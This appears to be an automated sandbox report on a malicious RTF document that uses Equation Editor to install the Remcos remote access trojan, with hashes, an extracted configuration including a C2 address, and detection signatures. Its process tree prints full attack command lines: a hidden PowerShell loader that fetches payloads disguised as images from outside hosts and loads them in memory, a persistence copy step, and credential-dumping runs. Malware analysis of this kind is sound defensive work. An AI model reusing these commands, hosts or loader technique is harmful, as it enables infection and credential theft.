Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    16/03/2024, 02:41

General

  • Target

    aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030.rtf

  • Size

    70KB

  • MD5

    cae8bb9d33e2340998ba5f75ad37f803

  • SHA1

    75e142060680509acade4921ea417e1d438a34fd

  • SHA256

    aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030

  • SHA512

    5b5ba31eef6383798733fcb5bbbbe0b28a35b8962207b8a08c494aa18ce48cf4f296af18299b8ddff51b7d6eb07d4864b3ddf4f95bebc8c76959f8ba1e0f8d98

  • SSDEEP

    1536:z8dfmjJH0y/OSefByvp/9/7otRf9rdO5WeIGLTlGrzYNY:z8dfW0yvDToXf9rd2WeI0RGYNY

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

107.172.31.178:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-NVSJ5U

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 23 IoCs
  • Detects executables built or packed with MPress PE compressor 12 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers 3 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs
  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 6 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:752
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:3048
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\greatdaytokiislover.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$leitariga = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $leitariga));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2868
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/753/713/original/new_image.jpg?1709908316', 'https://uploaddeimagens.com.br/images/004/753/714/original/new_image.jpg?1709908350'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SSIK/rlk/ppmax/701.342.581.741//:ptth' , '1' , 'C:\ProgramData\' , 'KISS','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2948
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\KISS.vbs
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1992
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:1876
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\temlvwvkkoowfcwiwjggnbdb"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2116
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\dgadnpglywgbqikmnutaqnxskvs"
                6⤵
                • Accesses Microsoft Outlook accounts
                PID:3000
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\oafoohrfueyosogqwfgbbskbtckgwv"
                6⤵
                  PID:2196

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

        Filesize

        67KB

        MD5

        753df6889fd7410a2e9fe333da83a429

        SHA1

        3c425f16e8267186061dd48ac1c77c122962456e

        SHA256

        b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

        SHA512

        9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

        Filesize

        1KB

        MD5

        a266bb7dcc38a562631361bbf61dd11b

        SHA1

        3b1efd3a66ea28b16697394703a72ca340a05bd5

        SHA256

        df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

        SHA512

        0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        e04b41d841b9caddb53f4e6e9340ebf3

        SHA1

        59fefd0f735f2f019934ec3d8f9e9ae13480e984

        SHA256

        3eb2faa071346a1c4cba22993d90a5ba530ae197e227b8e44fe888292112584d

        SHA512

        055cddc813520c4c1a671988a18ebbd7fabeaf837cd6fd232348f835a5d1a54cb6f2d2566ae5828ab6965dc25f31c9b5e1a15a10cf1cd6e7531a6c3c0f903535

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

        Filesize

        242B

        MD5

        a7be4d705fb91d709ca96fe0d4e8818f

        SHA1

        cbca322e6b7695224c05816fedbea7f1c8dc732a

        SHA256

        3e28cfa385806c50fc2494c6000ec522baa9536d5f62e65839bdf22b41713773

        SHA512

        9803fcf4f013eabd702de5cc6d601e2bc306b49d253c3f384ca3501fd94a63ced207cc47dfbe1aea65827febe4fa780e470d61bd086aa60d8c77ad10392db71f

      • C:\Users\Admin\AppData\Local\Temp\Tar236D.tmp

        Filesize

        175KB

        MD5

        dd73cead4b93366cf3465c8cd32e2796

        SHA1

        74546226dfe9ceb8184651e920d1dbfb432b314e

        SHA256

        a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

        SHA512

        ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

      • C:\Users\Admin\AppData\Local\Temp\temlvwvkkoowfcwiwjggnbdb

        Filesize

        2B

        MD5

        f3b25701fe362ec84616a93a45ce9998

        SHA1

        d62636d8caec13f04e28442a0a6fa1afeb024bbb

        SHA256

        b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

        SHA512

        98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

        Filesize

        20KB

        MD5

        a4ffbd374b8d62085a5b092eea1fa31b

        SHA1

        209e7de00208ee975d49a745a7c4895eff4b47d1

        SHA256

        40aafadbb75f610e72d6fea6872a56f04b6c0cffc1e880f63bcf397e3e32ee0f

        SHA512

        0e37a05801eef10ca9c98260949ce40bfb21ae5a3b05a7d6a7e7628023cbd03ecd071762151d0fc319d9b3de8234dbc1096d298b8f078bd5883bf9422bdd4848

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\23M67FD3QQYHPKTFS9GG.temp

        Filesize

        7KB

        MD5

        bfad9661c0ce96fdf5519d8a47e70bd8

        SHA1

        70fc7cedc9e9b463c8403d396878d51b944862cb

        SHA256

        1f23ae4122884929505942c1120d7e63b34170971be1c48fda447007a862ef7f

        SHA512

        b2e89620fee0141a50ef35d0b436b24fbda9eeac3f370891db41ae7fd3178da52cfb65e4488b21802449360c0082681f3a0f2690d33397869a888c0b749f835f

      • C:\Users\Admin\AppData\Roaming\greatdaytokiislover.vbs

        Filesize

        33KB

        MD5

        da24a3f9677942db1e73b0ef5d2011a4

        SHA1

        0ee17d73b3e26fe1c8b6680b92c305a4d850685c

        SHA256

        98e179fe22de663f2f6127de1354c0d14609c43ca0e644f320310104585f90ce

        SHA512

        46549a6ee806cf7c48328e80b124928258bed5ad182618c25b4bcbf61173ace8eb502f28ce5bf4dd9ba862d988a1c3a95ec86c9ce539fab6c30318c525138615
